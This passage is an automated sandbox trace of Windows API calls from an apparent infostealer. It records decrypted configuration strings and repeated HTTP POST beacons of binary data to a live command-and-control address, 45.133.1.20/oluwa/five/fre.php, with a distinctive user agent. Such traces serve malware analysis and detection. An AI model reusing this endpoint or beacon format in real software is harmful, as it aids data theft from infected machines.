application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0233.764] GetProcessHeap () returned 0x6a0000 [0233.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0233.764] GetProcessHeap () returned 0x6a0000 [0233.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 [0233.765] send (s=0x738, buf=0x6bd460*, len=242, flags=0) returned 242 [0233.766] send (s=0x738, buf=0x6bb998*, len=159, flags=0) returned 159 [0233.766] GetProcessHeap () returned 0x6a0000 [0233.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0233.766] recv (in: s=0x738, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0233.928] GetProcessHeap () returned 0x6a0000 [0233.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0233.930] GetProcessHeap () returned 0x6a0000 [0233.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0233.931] GetProcessHeap () returned 0x6a0000 [0233.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b99f0 | out: hHeap=0x6a0000) returned 1 [0233.931] GetProcessHeap () returned 0x6a0000 [0233.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0233.932] closesocket (s=0x738) returned 0 [0233.932] GetProcessHeap () returned 0x6a0000 [0233.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0233.932] GetProcessHeap () returned 0x6a0000 [0233.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0233.933] GetProcessHeap () returned 0x6a0000 [0233.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0233.933] GetProcessHeap () returned 0x6a0000 [0233.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0233.934] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x146c) returned 0x738 [0233.936] Sleep (dwMilliseconds=0xea60) [0233.937] GetProcessHeap () returned 0x6a0000 [0233.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0233.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.939] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.945] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0233.953] GetProcessHeap () returned 0x6a0000 [0233.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0233.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.955] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0233.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.956] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.958] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.958] GetProcessHeap () returned 0x6a0000 [0233.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0233.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.959] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0233.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.961] CryptDestroyKey (hKey=0x6ad020) returned 1 [0233.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.962] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0233.962] GetProcessHeap () returned 0x6a0000 [0233.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0233.964] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.965] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0233.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.971] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0233.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.972] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0233.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.973] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0233.973] GetProcessHeap () returned 0x6a0000 [0233.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0233.973] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0233.974] GetProcessHeap () returned 0x6a0000 [0233.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0233.975] GetProcessHeap () returned 0x6a0000 [0233.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0233.975] GetProcessHeap () returned 0x6a0000 [0233.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0233.976] GetProcessHeap () returned 0x6a0000 [0233.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0233.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.977] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.986] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0233.996] GetProcessHeap () returned 0x6a0000 [0233.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0233.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.997] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0233.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.999] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0234.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.000] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.000] GetProcessHeap () returned 0x6a0000 [0234.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0234.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.002] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0234.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.003] CryptDestroyKey (hKey=0x6ad020) returned 1 [0234.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.005] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0234.005] GetProcessHeap () returned 0x6a0000 [0234.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0234.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.006] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0234.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.007] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0234.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.008] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0234.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.010] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0234.010] GetProcessHeap () returned 0x6a0000 [0234.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0234.010] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0234.010] GetProcessHeap () returned 0x6a0000 [0234.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0234.010] socket (af=2, type=1, protocol=6) returned 0x73c [0234.010] connect (s=0x73c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0234.032] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0234.033] GetProcessHeap () returned 0x6a0000 [0234.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0234.033] GetProcessHeap () returned 0x6a0000 [0234.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f10 [0234.033] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0234.035] wvsprintfA (in: param_1=0x6d8f10, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0234.035] GetProcessHeap () returned 0x6a0000 [0234.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b99f0 [0234.035] GetProcessHeap () returned 0x6a0000 [0234.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 [0234.036] GetProcessHeap () returned 0x6a0000 [0234.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0234.036] GetProcessHeap () returned 0x6a0000 [0234.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f10 [0234.038] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0234.039] wvsprintfA (in: param_1=0x6d8f10, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0234.039] GetProcessHeap () returned 0x6a0000 [0234.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0234.039] GetProcessHeap () returned 0x6a0000 [0234.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 [0234.040] send (s=0x73c, buf=0x6bd460*, len=242, flags=0) returned 242 [0234.042] send (s=0x73c, buf=0x6bb998*, len=159, flags=0) returned 159 [0234.042] GetProcessHeap () returned 0x6a0000 [0234.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0234.042] recv (in: s=0x73c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0234.127] GetProcessHeap () returned 0x6a0000 [0234.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0234.127] GetProcessHeap () returned 0x6a0000 [0234.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0234.128] GetProcessHeap () returned 0x6a0000 [0234.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b99f0 | out: hHeap=0x6a0000) returned 1 [0234.129] GetProcessHeap () returned 0x6a0000 [0234.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0234.130] closesocket (s=0x73c) returned 0 [0234.130] GetProcessHeap () returned 0x6a0000 [0234.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0234.130] GetProcessHeap () returned 0x6a0000 [0234.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0234.131] GetProcessHeap () returned 0x6a0000 [0234.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0234.132] GetProcessHeap () returned 0x6a0000 [0234.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0234.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1470) returned 0x73c [0234.135] Sleep (dwMilliseconds=0xea60) [0234.139] GetProcessHeap () returned 0x6a0000 [0234.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0234.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0234.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.153] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0234.166] GetProcessHeap () returned 0x6a0000 [0234.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba7a0 [0234.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.167] CryptImportKey (in: hProv=0x6bef48, pbData=0x6ba7a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0234.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.168] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0234.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.169] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.170] GetProcessHeap () returned 0x6a0000 [0234.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba7a0 | out: hHeap=0x6a0000) returned 1 [0234.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.175] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0234.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.176] CryptDestroyKey (hKey=0x6ad020) returned 1 [0234.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.177] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0234.177] GetProcessHeap () returned 0x6a0000 [0234.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0234.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.179] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0234.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.180] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0234.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.185] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0234.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.186] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0234.186] GetProcessHeap () returned 0x6a0000 [0234.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0234.186] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0234.187] GetProcessHeap () returned 0x6a0000 [0234.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0234.187] GetProcessHeap () returned 0x6a0000 [0234.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0234.188] GetProcessHeap () returned 0x6a0000 [0234.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0234.188] GetProcessHeap () returned 0x6a0000 [0234.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0234.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0234.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.197] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0234.212] GetProcessHeap () returned 0x6a0000 [0234.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0234.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.216] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0234.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.218] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0234.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.219] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0234.219] GetProcessHeap () returned 0x6a0000 [0234.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0234.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.221] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0234.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.223] CryptDestroyKey (hKey=0x6ad020) returned 1 [0234.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0234.224] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0234.225] GetProcessHeap () returned 0x6a0000 [0234.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0234.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.226] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0234.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.227] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0234.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.228] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0234.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.230] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0234.230] GetProcessHeap () returned 0x6a0000 [0234.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0234.230] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0234.230] GetProcessHeap () returned 0x6a0000 [0234.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0234.230] socket (af=2, type=1, protocol=6) returned 0x740 [0234.230] connect (s=0x740, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0234.421] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0234.421] GetProcessHeap () returned 0x6a0000 [0234.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0234.421] GetProcessHeap () returned 0x6a0000 [0234.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f10 [0234.422] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0234.425] wvsprintfA (in: param_1=0x6d8f10, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0234.425] GetProcessHeap () returned 0x6a0000 [0234.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9b70 [0234.425] GetProcessHeap () returned 0x6a0000 [0234.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 [0234.425] GetProcessHeap () returned 0x6a0000 [0234.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0234.425] GetProcessHeap () returned 0x6a0000 [0234.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f10 [0234.426] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0234.427] wvsprintfA (in: param_1=0x6d8f10, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0234.428] GetProcessHeap () returned 0x6a0000 [0234.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0234.428] GetProcessHeap () returned 0x6a0000 [0234.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 [0234.428] send (s=0x740, buf=0x6bd460*, len=242, flags=0) returned 242 [0234.429] send (s=0x740, buf=0x6bb998*, len=159, flags=0) returned 159 [0234.430] GetProcessHeap () returned 0x6a0000 [0234.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0234.430] recv (in: s=0x740, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0234.525] GetProcessHeap () returned 0x6a0000 [0234.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 